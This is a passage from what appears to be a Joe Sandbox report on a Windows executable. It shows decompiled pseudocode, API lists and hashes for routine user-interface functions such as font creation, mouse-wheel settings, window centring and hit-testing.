				if(_t77 == 0) {
					_t53 = LoadBitmapA( *(E00424BFB() + 0xc), 0x7912);
					 *0x439ca4 = _t53;
					if(GetObjectA(_t53, 0x18, _t70 - 0x78) != 0) {
						 *0x439c98 =  *((intOrPtr*)(_t70 - 0x74));
						 *0x439c9c =  *((intOrPtr*)(_t70 - 0x70));
					}
				}
				_t79 =  *0x439ca0; // 0x0
				if(_t79 != 0) {
					L11:
					_push(_t67);
					_push(_t64);
					_push(0);
					E0041A369(_t70 - 0x24, _t82);
					_t31 =  *0x439ca0; // 0x0
					 *(_t70 - 4) = 0;
					if(_t31 == 0) {
						_t65 = 0;
						__eflags = 0;
					} else {
						_t65 = SelectObject( *(_t70 - 0x20), _t31);
					}
					 *((intOrPtr*)(_t70 - 0x10)) = GetTextMetricsA( *(_t70 - 0x1c), _t70 - 0xb0);
					if(_t65 != 0) {
						SelectObject( *(_t70 - 0x20), _t65);
					}
					if( *((intOrPtr*)(_t70 - 0x10)) == 0) {
						L18:
						E0041A89B(0x439ca0);
						goto L19;
					} else {
						_t86 =  *(_t70 - 0xb0) -  *((intOrPtr*)(_t70 - 0xa4)) -  *0x439c9c; // 0x0
						if(_t86 <= 0) {
							L19:
							 *(_t70 - 4) =  *(_t70 - 4) | 0xffffffff;
							E0041A3DB(_t70 - 0x24);
							goto L20;
						}
						goto L18;
					}
				} else {
					E00406330(_t70 - 0x60, 0, 0x3c);
					 *((char*)(_t70 - 0x49)) = 1;
					 *((intOrPtr*)(_t70 - 0x50)) = 0x190;
					_t42 = 1;
					 *(_t70 - 0x60) = _t42 -  *0x439c9c;
					if(GetSystemMetrics(0x2a) == 0) {
						_push("Small Fonts");
					} else {
						_push("Terminal");
					}
					lstrcpyA(_t70 - 0x44, ??);
					if(E0041A6E1(0xf233, _t70 - 0x60) == 0) {
						 *((char*)(_t70 - 0x45)) = 0x20;
					}
					_t50 = CreateFontIndirectA(_t70 - 0x60);
					_t82 = _t50;
					 *0x439ca0 = _t50;
					if(_t50 == 0) {
						L20:
						_t28 = E00425FC6(0xa);
						goto L21;
					} else {
						goto L11;
					}
				}
			}

0x00422a19
0x00422a19
0x00422a1e
0x00422a2c
0x00422a32
0x00422b78
0x00422b7c
0x00422b84
0x00422b84
0x00422a3a
0x00422a3f
0x00422a45
0x00422a55
0x00422a5e
0x00422a6f
0x00422a74
0x00422a7c
0x00422a7c
0x00422a6f
0x00422a81
0x00422a87
0x00422afa
0x00422afa
0x00422afb
0x00422afc
0x00422b00
0x00422b05
0x00422b12
0x00422b15
0x00422b21
0x00422b21
0x00422b17
0x00422b1d
0x00422b1d
0x00422b35
0x00422b38
0x00422b3e
0x00422b3e
0x00422b45
0x00422b5b
0x00422b60
0x00000000
0x00422b47
0x00422b53
0x00422b59
0x00422b65
0x00422b65
0x00422b6c
0x00000000
0x00422b6c
0x00000000
0x00422b59
0x00422a89
0x00422a90
0x00422a98
0x00422a9c
0x00422aa5
0x00422aae
0x00422ab9
0x00422ac2
0x00422abb
0x00422abb
0x00422abb
0x00422acb
0x00422ae1
0x00422ae3
0x00422ae3
0x00422aeb
0x00422af1
0x00422af3
0x00422af8
0x00422b71
0x00422b73
0x00000000
0x00000000
0x00000000
0x00000000
0x00422af8

APIs

__EH_prolog.LIBCMT ref: 00422A1E

Part of subcall function 00425F56: EnterCriticalSection.KERNEL32(00439A28,?,00000000,?,?,00425D48,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26), ref: 00425F91
Part of subcall function 00425F56: InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,00425D48,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26), ref: 00425FA3
Part of subcall function 00425F56: LeaveCriticalSection.KERNEL32(00439A28,?,00000000,?,?,00425D48,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26), ref: 00425FAC
Part of subcall function 00425F56: EnterCriticalSection.KERNEL32(00000000,00000000,?,?,00425D48,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26,00412700), ref: 00425FBE

LoadBitmapA.USER32 ref: 00422A55
GetObjectA.GDI32(00000000,00000018,?), ref: 00422A67
GetSystemMetrics.USER32 ref: 00422AB1
lstrcpyA.KERNEL32(?,Small Fonts,?,0000000A), ref: 00422ACB
CreateFontIndirectA.GDI32(?), ref: 00422AEB
SelectObject.GDI32(?,00000000), ref: 00422B1B
GetTextMetricsA.GDI32(?,?), ref: 00422B2D
SelectObject.GDI32(?,00000000), ref: 00422B3E

Strings

Small Fonts, xrefs: 00422AC2
, xrefs: 00422AE3
Terminal, xrefs: 00422ABB

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: CriticalSection$Object$EnterMetricsSelect$BitmapCreateFontH_prologIndirectInitializeLeaveLoadSystemTextlstrcpy
String ID: $Small Fonts$Terminal
API String ID: 1234877182-3042510724
Opcode ID: 29564cb59527804121ee2a9ce267bff2e1028d7c4982a5c458cb6d41a7627f25
Instruction ID: af1173b3a4b80694a70ec61d8b55af463f2ab6573842c533f6f97c7bdcca2de6
Opcode Fuzzy Hash: 29564cb59527804121ee2a9ce267bff2e1028d7c4982a5c458cb6d41a7627f25
Instruction Fuzzy Hash: 72417171B00219AFDB20DFA5ED85AAE7BB5FB04344F94013AE505E6191DBB85D01CB29

Uniqueness

Uniqueness Score: -1.00%

Function 0041ABA7, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 80
registrywindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041ABA7() {
				void* _v8;
				int _v12;
				int _v16;
				char _v144;
				void _t9;
				struct HWND__* _t20;
				void _t21;
				int _t22;
				int _t23;
				int _t27;
				short _t28;
				intOrPtr _t30;

				_t27 =  *0x437cdc; // 0x0
				if(_t27 != 0) {
					L16:
					_t9 =  *0x439c90; // 0x0
					return _t9;
				}
				_t28 =  *0x439c8c; // 0x0
				 *0x437cdc = 1;
				if(_t28 != 0) {
					L10:
					__eflags =  *0x439c8c - 2;
					if( *0x439c8c != 2) {
						L4:
						_t30 =  *0x439c3c; // 0x1
						 *0x439c90 = 3;
						if(_t30 != 0) {
							__eflags =  *0x439c38; // 0x0
							if(__eflags == 0) {
								SystemParametersInfoA(0x68, 0, 0x439c90, 0);
							}
						} else {
							if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop", 0, 1,  &_v8) == 0) {
								_v12 = 0x80;
								if(RegQueryValueExA(_v8, "WheelScrollLines", 0,  &_v16,  &_v144,  &_v12) == 0) {
									 *0x439c90 = E0040718F( &_v144, 0, 0xa);
								}
								RegCloseKey(_v8);
							}
						}
						goto L16;
					}
					_t20 = FindWindowA("MouseZ", "Magellan MSWHEEL");
					__eflags = _t20;
					if(_t20 == 0) {
						goto L4;
					}
					_t23 =  *0x439c88; // 0x0
					__eflags = _t23;
					if(_t23 == 0) {
						goto L4;
					}
					_t21 = SendMessageA(_t20, _t23, 0, 0);
					 *0x439c90 = _t21;
					return _t21;
				}
				_t22 = RegisterWindowMessageA("MSH_SCROLL_LINES_MSG");
				 *0x439c88 = _t22;
				if(_t22 != 0) {
					 *0x439c8c = 2;
					goto L10;
				} else {
					 *0x439c8c = 1;
					goto L4;
				}
			}

0x0041abb3
0x0041abb9
0x0041acdc
0x0041acdc
0x00000000
0x0041acdc
0x0041abbf
0x0041abc6
0x0041abd0
0x0041ac80
0x0041ac80
0x0041ac88
0x0041abf7
0x0041abf7
0x0041abfd
0x0041ac07
0x0041acc5
0x0041accb
0x0041acd6
0x0041acd6
0x0041ac0d
0x0041ac26
0x0041ac2f
0x0041ac53
0x0041ac67
0x0041ac67
0x0041ac6f
0x0041ac6f
0x0041ac26
0x00000000
0x0041ac07
0x0041ac98
0x0041ac9e
0x0041aca0
0x00000000
0x00000000
0x0041aca6
0x0041acac
0x0041acae
0x00000000
0x00000000
0x0041acb8
0x0041acbe
0x00000000
0x0041acbe
0x0041abdb
0x0041abe3
0x0041abe8
0x0041ac77
0x00000000
0x0041abee
0x0041abee
0x00000000
0x0041abee

APIs

RegisterWindowMessageA.USER32(MSH_SCROLL_LINES_MSG), ref: 0041ABDB
RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop,00000000,00000001,?), ref: 0041AC1E
RegQueryValueExA.ADVAPI32(?,WheelScrollLines,00000000,?,?,?), ref: 0041AC4B
RegCloseKey.ADVAPI32(?), ref: 0041AC6F
FindWindowA.USER32 ref: 0041AC98
SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 0041ACB8
SystemParametersInfoA.USER32(00000068,00000000,00439C90,00000000), ref: 0041ACD6

Strings

Control Panel\Desktop, xrefs: 0041AC14
Magellan MSWHEEL, xrefs: 0041AC8E
MSH_SCROLL_LINES_MSG, xrefs: 0041ABD6
WheelScrollLines, xrefs: 0041AC43
MouseZ, xrefs: 0041AC93

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: MessageWindow$CloseFindInfoOpenParametersQueryRegisterSendSystemValue
String ID: Control Panel\Desktop$MSH_SCROLL_LINES_MSG$Magellan MSWHEEL$MouseZ$WheelScrollLines
API String ID: 1228133072-821443377
Opcode ID: 95f70896755e55a52fc01f3e5765352c2d6134ba5801c03a0d6e533f6f354ec8
Instruction ID: 5c83e38d2889ea35cb43268cbe58cad34713885164d32870b4297f9966653a84
Opcode Fuzzy Hash: 95f70896755e55a52fc01f3e5765352c2d6134ba5801c03a0d6e533f6f354ec8
Instruction Fuzzy Hash: B0216F70A45214ABDB309B51EC49AEB3BB8FB00744F506026E405D2260EBB85DD5DFDE

Uniqueness

Uniqueness Score: -1.00%

Function 00421F4E, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 73
stringCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00421F4E(void* __ecx, CHAR* _a4) {
				char _v520;
				intOrPtr _t36;
				intOrPtr _t45;
				void* _t55;
				void* _t56;

				_t55 = __ecx;
				if((E00416528(__ecx) & 0x00000040) == 0) {
					lstrcpyA( &_v520,  *(__ecx + 0xac));
					if(_a4 != 0) {
						lstrcatA( &_v520, " - ");
						lstrcatA( &_v520, _a4);
						_t36 =  *((intOrPtr*)(_t55 + 0x40));
						if(_t36 > 0) {
							_push(_t36);
							wsprintfA(_t56 + lstrlenA( &_v520) - 0x204, ":%d");
						}
					}
					L9:
					return E0041A843( *((intOrPtr*)(_t55 + 0x1c)),  &_v520);
				}
				_v520 = _v520 & 0x00000000;
				if(_a4 == 0) {
					L5:
					lstrcatA( &_v520,  *(_t55 + 0xac));
					goto L9;
				}
				lstrcpyA( &_v520, _a4);
				_t45 =  *((intOrPtr*)(_t55 + 0x40));
				if(_t45 > 0) {
					_push(_t45);
					wsprintfA(_t56 + lstrlenA( &_v520) - 0x204, ":%d");
				}
				lstrcatA( &_v520, " - ");
				goto L5;
			}

0x00421f59
0x00421f63
0x00421fdf
0x00421fe9
0x00421ffd
0x00422009
0x0042200b
0x00422010
0x00422012
0x0042202d
0x00422033
0x00422010
0x00422036
0x00422048
0x00422048
0x00421f65
0x00421f76
0x00421fc1
0x00421fce
0x00000000
0x00421fce
0x00421f82
0x00421f88
0x00421f8d
0x00421f8f
0x00421faa
0x00421fb0
0x00421fbf
0x00000000

APIs

Part of subcall function 00416528: GetWindowLongA.USER32 ref: 00416534

lstrcpyA.KERNEL32(00000000,00000000), ref: 00421F82
lstrlenA.KERNEL32(00000000,:%d,?), ref: 00421F9C
wsprintfA.USER32 ref: 00421FAA
lstrcatA.KERNEL32(00000000, - ), ref: 00421FBF
lstrcatA.KERNEL32(00000000,?), ref: 00421FCE
lstrcpyA.KERNEL32(?,?), ref: 00421FDF
lstrcatA.KERNEL32(?, - ), ref: 00421FFD
lstrcatA.KERNEL32(?,00000000), ref: 00422009
lstrlenA.KERNEL32(?,:%d,?), ref: 0042201F
wsprintfA.USER32 ref: 0042202D

Strings

- , xrefs: 00421FB9, 00421FF7
:%d, xrefs: 00421F96, 00422019

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: lstrcat$lstrcpylstrlenwsprintf$LongWindow
String ID: - $:%d
API String ID: 3078587954-2359489159
Opcode ID: 6d21e6e38d927462feef01ef09ad18ff503edbabfb763a1af246d99f2b2f3c6b
Instruction ID: ae4adf689d7d90f23104f1149d1543740a665fba2c23219458a983a253b49f06
Opcode Fuzzy Hash: 6d21e6e38d927462feef01ef09ad18ff503edbabfb763a1af246d99f2b2f3c6b
Instruction Fuzzy Hash: 5A2123B1A0031EEBCB20ABA5ED4DF8A77ACEF40344F5044A6E615D2151D778E645CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00415B0F, Relevance: 19.7, APIs: 13, Instructions: 174
windowCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00415B0F(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				signed int _v5;
				intOrPtr _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				struct tagRECT _v80;
				char _v100;
				intOrPtr _t55;
				struct HWND__* _t56;
				intOrPtr _t78;
				intOrPtr _t90;
				signed int _t99;
				struct HWND__* _t100;
				struct HWND__* _t102;
				void* _t104;
				long _t110;
				void* _t113;
				struct HWND__* _t115;
				void* _t117;
				intOrPtr _t119;
				intOrPtr _t123;

				_t113 = __edx;
				_t119 = __ecx;
				_v12 = __ecx;
				_v8 = E00416528(__ecx);
				_t55 = _a4;
				if(_t55 == 0) {
					if((_v5 & 0x00000040) == 0) {
						_t56 = GetWindow( *(__ecx + 0x1c), 4);
					} else {
						_t56 = GetParent( *(__ecx + 0x1c));
					}
					_t115 = _t56;
					if(_t115 != 0) {
						_t100 = SendMessageA(_t115, 0x36b, 0, 0);
						if(_t100 != 0) {
							_t115 = _t100;
						}
					}
				} else {
					_t115 =  *(_t55 + 0x1c);
				}
				GetWindowRect( *(_t119 + 0x1c),  &_v44);
				if((_v5 & 0x00000040) != 0) {
					_t102 = GetParent( *(_t119 + 0x1c));
					GetClientRect(_t102,  &_v28);
					GetClientRect(_t115,  &_v60);
					MapWindowPoints(_t115, _t102,  &_v60, 2);
				} else {
					if(_t115 != 0) {
						_t99 = GetWindowLongA(_t115, 0xfffffff0);
						if((_t99 & 0x10000000) == 0 || (_t99 & 0x20000000) != 0) {
							_t115 = 0;
						}
					}
					_v100 = 0x28;
					if(_t115 != 0) {
						GetWindowRect(_t115,  &_v60);
						E00404F6B(E00404F00(_t115, 2),  &_v100);
						CopyRect( &_v28,  &_v80);
					} else {
						_t90 = E00404DAE();
						if(_t90 != 0) {
							_t90 =  *((intOrPtr*)(_t90 + 0x1c));
						}
						E00404F6B(E00404F00(_t90, 1),  &_v100);
						CopyRect( &_v60,  &_v80);
						CopyRect( &_v28,  &_v80);
					}
				}
				_t117 = _v44.right - _v44.left;
				asm("cdq");
				_t104 = _v44.bottom - _v44.top;
				asm("cdq");
				_t114 = _v60.bottom;
				_t110 = (_v60.left + _v60.right - _t113 >> 1) - (_t117 - _t113 >> 1);
				asm("cdq");
				asm("cdq");
				_t123 = (_v60.top + _v60.bottom - _v60.bottom >> 1) - (_t104 - _t114 >> 1);
				if(_t110 >= _v28.left) {
					_t78 = _v28.right;
					if(_t117 + _t110 > _t78) {
						_t110 = _t78 - _v44.right + _v44.left;
					}
				} else {
					_t110 = _v28.left;
				}
				if(_t123 >= _v28.top) {
					if(_t104 + _t123 > _v28.bottom) {
						_t123 = _v44.top - _v44.bottom + _v28.bottom;
					}
				} else {
					_t123 = _v28.top;
				}
				return E0041663D(_v12, 0, _t110, _t123, 0xffffffff, 0xffffffff, 0x15);
			}

0x00415b0f
0x00415b17
0x00415b1a
0x00415b22
0x00415b25
0x00415b2a
0x00415b35
0x00415b47
0x00415b37
0x00415b3a
0x00415b3a
0x00415b4d
0x00415b51
0x00415b5d
0x00415b65
0x00415b67
0x00415b67
0x00415b65
0x00415b2c
0x00415b2c
0x00415b2c
0x00415b76
0x00415b7c
0x00415c1c
0x00415c23
0x00415c2a
0x00415c34
0x00415b82
0x00415b84
0x00415b89
0x00415b94
0x00415b9d
0x00415b9d
0x00415b94
0x00415ba1
0x00415ba8
0x00415be9
0x00415bf8
0x00415c05
0x00415baa
0x00415baa
0x00415bb1
0x00415bb3
0x00415bb3
0x00415bc3
0x00415bd6
0x00415be0
0x00415be0
0x00415ba8
0x00415c45
0x00415c4b
0x00415c4e
0x00415c55
0x00415c58
0x00415c5f
0x00415c66
0x00415c6d
0x00415c74
0x00415c79
0x00415c80
0x00415c87
0x00415c8f
0x00415c8f
0x00415c7b
0x00415c7b
0x00415c7b
0x00415c94
0x00415ca0
0x00415ca8
0x00415ca8
0x00415c96
0x00415c96
0x00415c96
0x00415cc1

APIs

Part of subcall function 00416528: GetWindowLongA.USER32 ref: 00416534

GetParent.USER32(?), ref: 00415B3A
SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 00415B5D
GetWindowRect.USER32 ref: 00415B76
GetWindowLongA.USER32 ref: 00415B89
CopyRect.USER32 ref: 00415BD6
CopyRect.USER32 ref: 00415BE0
GetWindowRect.USER32 ref: 00415BE9
CopyRect.USER32 ref: 00415C05

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Rect$Window$Copy$Long$MessageParentSend
String ID:
API String ID: 808654186-0
Opcode ID: 08e789acf66eab3a19b7e86daab60fd72cfb8a595c4ec189871ddf3cd5da10ba
Instruction ID: 84b52a2fdf36364977305fff30e360f87450067914530d6a9d7fdd5b83c17d5a
Opcode Fuzzy Hash: 08e789acf66eab3a19b7e86daab60fd72cfb8a595c4ec189871ddf3cd5da10ba
Instruction Fuzzy Hash: A4517571A04619AFCB10DFA8DC85EEEBBB9AF84314F154125E501F3291D734B9468B98

Uniqueness

Uniqueness Score: -1.00%

Function 00428D7F, Relevance: 19.6, APIs: 13, Instructions: 134
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E00428D7F(intOrPtr* __ecx) {
				struct tagSIZE _v12;
				int _v16;
				struct tagSIZE _v24;
				void* _v28;
				int _v32;
				struct tagLOGFONTA _v92;
				struct tagTEXTMETRICA _v148;
				void* _t64;
				long _t70;
				void* _t79;
				signed int _t83;
				signed int _t84;
				void* _t91;
				int _t117;
				void* _t119;
				void** _t122;

				_t121 = __ecx;
				if( *(__ecx + 8) != 0) {
					_t64 =  *(__ecx + 0x2c);
					if(_t64 == 0) {
						_push(0xe);
						return  *((intOrPtr*)( *__ecx + 0x24))();
					}
					if( *((intOrPtr*)(__ecx + 4)) != 0) {
						GetObjectA(_t64, 0x3c,  &_v92);
						GetTextFaceA( *(__ecx + 8), 0x20,  &(_v92.lfFaceName));
						GetTextMetricsA( *(__ecx + 8),  &_v148);
						_t70 = _v148.tmHeight;
						if(_t70 >= 0) {
							_v92.lfHeight = _v148.tmInternalLeading - _t70;
						} else {
							_v92.lfHeight = _t70;
						}
						_v92.lfWidth = _v148.tmAveCharWidth;
						_v92.lfWeight = _v148.tmWeight;
						_v92.lfItalic = _v148.tmItalic;
						_v92.lfUnderline = _v148.tmUnderlined;
						_v92.lfStrikeOut = _v148.tmStruckOut;
						_v92.lfCharSet = _v148.tmCharSet;
						_v92.lfPitchAndFamily = _v148.tmPitchAndFamily;
						_t79 = CreateFontIndirectA( &_v92);
						_v28 = _t79;
						SelectObject( *(_t121 + 4), _t79);
						GetTextMetricsA( *(_t121 + 4),  &_v148);
						_t83 = _v148.tmHeight;
						_t117 =  ~(_v92.lfHeight);
						if(_t83 >= 0) {
							_t84 = _t83 - _v148.tmInternalLeading;
						} else {
							_t84 =  ~_t83;
						}
						_v16 = _t84;
						GetWindowExtEx( *(_t121 + 4),  &_v12);
						GetViewportExtEx( *(_t121 + 4),  &_v24);
						if(_v12.cy < 0) {
							_v12.cy =  ~(_v12.cy);
						}
						if(_v24.cy < 0) {
							_v24.cy =  ~(_v24.cy);
						}
						_v32 = MulDiv(_t117, _v24.cy, _v12.cy);
						if(_v32 >= MulDiv(_v16, _v24.cy, _v12.cy)) {
							_t119 = _v28;
						} else {
							_v92.lfFaceName = _v92.lfFaceName & 0x00000000;
							_v92.lfPitchAndFamily = (_v92.lfPitchAndFamily & 0 | (_v92.lfPitchAndFamily & 0x000000f0) != 0x00000050) - 0x00000001 & 0x00000050;
							_t119 = CreateFontIndirectA( &_v92);
							SelectObject( *(_t121 + 4), _t119);
							DeleteObject(_v28);
						}
						_t122 = _t121 + 0x28;
						_t91 = E0041A89B(_t122);
						 *_t122 = _t119;
						return _t91;
					}
				}
				return _t64;
			}

0x00428d89
0x00428d8f
0x00428d95
0x00428d9a
0x00428d9e
0x00000000
0x00428da0
0x00428dac
0x00428dbb
0x00428dca
0x00428de0
0x00428de2
0x00428dea
0x00428df9
0x00428dec
0x00428dec
0x00428dec
0x00428e05
0x00428e0b
0x00428e11
0x00428e17
0x00428e1d
0x00428e23
0x00428e29
0x00428e30
0x00428e33
0x00428e39
0x00428e49
0x00428e4e
0x00428e54
0x00428e58
0x00428e5e
0x00428e5a
0x00428e5a
0x00428e5a
0x00428e64
0x00428e6e
0x00428e7b
0x00428e85
0x00428e8c
0x00428e8c
0x00428e93
0x00428e9a
0x00428e9a
0x00428eaf
0x00428ebd
0x00428ef1
0x00428ebf
0x00428ec2
0x00428ed1
0x00428eda
0x00428ee0
0x00428ee9
0x00428ee9
0x00428ef4
0x00428ef8
0x00428efd
0x00000000
0x00428f00
0x00428dac
0x00428f03

APIs

GetObjectA.GDI32(?,0000003C,?), ref: 00428DBB
GetTextFaceA.GDI32(00000000,00000020,?), ref: 00428DCA
GetTextMetricsA.GDI32(00000000,?), ref: 00428DE0
CreateFontIndirectA.GDI32(?), ref: 00428E30
SelectObject.GDI32(00000000,00000000), ref: 00428E39
GetTextMetricsA.GDI32(00000000,?), ref: 00428E49
GetWindowExtEx.GDI32(00000000,00000000), ref: 00428E6E
GetViewportExtEx.GDI32(00000000,?), ref: 00428E7B
MulDiv.KERNEL32(?,00000000,00000000), ref: 00428EAA
MulDiv.KERNEL32(?,00000000,00000000), ref: 00428EB8
CreateFontIndirectA.GDI32(?), ref: 00428ED8

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Text$CreateFontIndirectMetricsObject$FaceSelectViewportWindow
String ID:
API String ID: 3870699365-0
Opcode ID: 10801792fbe3792cf5b3815eddb952798c023c596e164af8040c919a982e3b9b
Instruction ID: d30efaf7af162c4076970c06207e774494d4aa7f708cde8adb03360c61ae062c
Opcode Fuzzy Hash: 10801792fbe3792cf5b3815eddb952798c023c596e164af8040c919a982e3b9b
Instruction Fuzzy Hash: 15518531A01299EFCF21CFE8DD44AEEBBB9EF18300F14446AE455A7221D734AA46DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00422E02, Relevance: 18.3, APIs: 12, Instructions: 288
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00422E02(intOrPtr __ecx, struct tagPOINT _a4, intOrPtr _a8) {
				signed char _v6;
				signed int _v7;
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				struct tagRECT _v112;
				intOrPtr _t141;
				void* _t144;
				intOrPtr _t145;
				intOrPtr _t148;
				void* _t150;
				signed int _t151;
				void* _t161;
				int _t177;
				void* _t184;
				signed int _t188;
				void* _t190;
				signed int _t194;
				void* _t196;
				void* _t198;
				signed int _t205;
				int _t206;
				void* _t219;
				intOrPtr _t238;
				intOrPtr _t241;
				int _t243;
				signed int _t245;
				signed int _t246;
				int _t251;

				_t241 = __ecx;
				_v16 = __ecx;
				_v8 = E00416528(__ecx);
				GetWindowRect( *(__ecx + 0x1c),  &_v44);
				_t205 = GetSystemMetrics(0x21);
				_v12 = _t205;
				_v28 = GetSystemMetrics(0x20);
				if( *0x439c44 != 0) {
					_t177 = E004136A7(_t241);
					_t251 = _t177;
					_t243 = 2;
					if( *0x439c3c == 0 || (_v7 & 0x00000010) == 0) {
						L6:
						if(_t251 < 0xa || _t251 > 0x11) {
							if(_t251 != 4) {
								goto L17;
							}
							goto L9;
						} else {
							L9:
							if((_v7 & 0x00000008) == 0) {
								InflateRect( &_v44,  ~_v28,  ~_t205);
								if((_v7 & 0x00000002) == 0) {
									L17:
									return _t251;
								}
								_t184 = _t251 - 4;
								if(_t184 == 0) {
									L22:
									_t188 = (0 | _a8 - _v44.bottom <= 0x00000000) - 0x00000001 & 0x00000004;
									L23:
									return _t188 + 0xb;
								}
								_t190 = _t184 - 9;
								if(_t190 == 0) {
									_t194 = (0 | _a8 - _v44.top >= 0x00000000) - 0x00000001 & _t243;
									L19:
									return _t194 + 0xa;
								}
								_t196 = _t190 - 1;
								if(_t196 == 0) {
									_t188 = 0 | _a8 - _v44.top < 0x00000000;
									goto L23;
								}
								_t198 = _t196 - _t243;
								if(_t198 == 0) {
									_t194 = (0 | _a8 - _v44.bottom <= 0x00000000) - 0x00000001 & 0x00000005;
									goto L19;
								}
								if(_t198 == 1) {
									goto L22;
								}
								goto L17;
							}
							return _t243;
						}
					} else {
						if(_t251 == 3) {
							_t251 = _t243;
						}
						if(GetKeyState(_t243) < 0) {
							L25:
							return 0;
						} else {
							goto L6;
						}
					}
				}
				_push(_a8);
				if(PtInRect( &_v44, _a4.x) == 0) {
					goto L25;
				}
				_t206 = GetSystemMetrics(6);
				_v20 = _t206;
				_t245 = GetSystemMetrics(5);
				_v112.top = _v44.top;
				_v112.left = _v44.left;
				_v112.bottom = _v44.bottom;
				_v112.right = _v44.right;
				_push( &_v112);
				E00422D9C(0);
				CopyRect( &_v60,  &_v112);
				_push(_a8);
				if(PtInRect( &_v60, _a4.x) != 0) {
					_push(1);
					L61:
					_pop(_t144);
					return _t144;
				}
				if((_v8 & 0x00040600) == 0) {
					L56:
					_t141 =  *0x439c9c; // 0x0
					_push(_a8);
					_v44.bottom = _t206 + _t141 + _v44.top;
					if(PtInRect( &_v44, _a4.x) == 0) {
						_push(0xfffffffe);
						goto L61;
					}
					_t145 =  *0x439c98; // 0x0
					if(_a4.x >= _t145 + _v44.left - 2 || (_v6 & 0x00000008) == 0) {
						L54:
						_push(2);
					} else {
						_push(3);
					}
					goto L61;
				}
				_t246 = _v12;
				_t148 =  *0x439c98; // 0x0
				_t150 = _t148 - _t245 + _t245 * 2 + _v28;
				_t219 = _t246 - _t206 + _t206 +  *0x439c9c;
				if(_a8 >= _v44.top + _t246) {
					_t238 = _v44.bottom;
					if(_a8 < _t238 - _t246) {
						_t151 = _v28;
						if(_a4.x >= _v44.left + _t151) {
							if(_a4.x < _v44.right - _t151) {
								InflateRect( &_v44,  ~_t151,  ~_v12);
								_t206 = _v20;
								goto L56;
							}
							if((_v7 & 0x00000002) == 0) {
								if(_a8 > _v44.top + _t219) {
									_t161 = ((0 | _a8 - _t238 - _t219 < 0x00000000) - 0x00000001 & 0x00000006) + 0xb;
								} else {
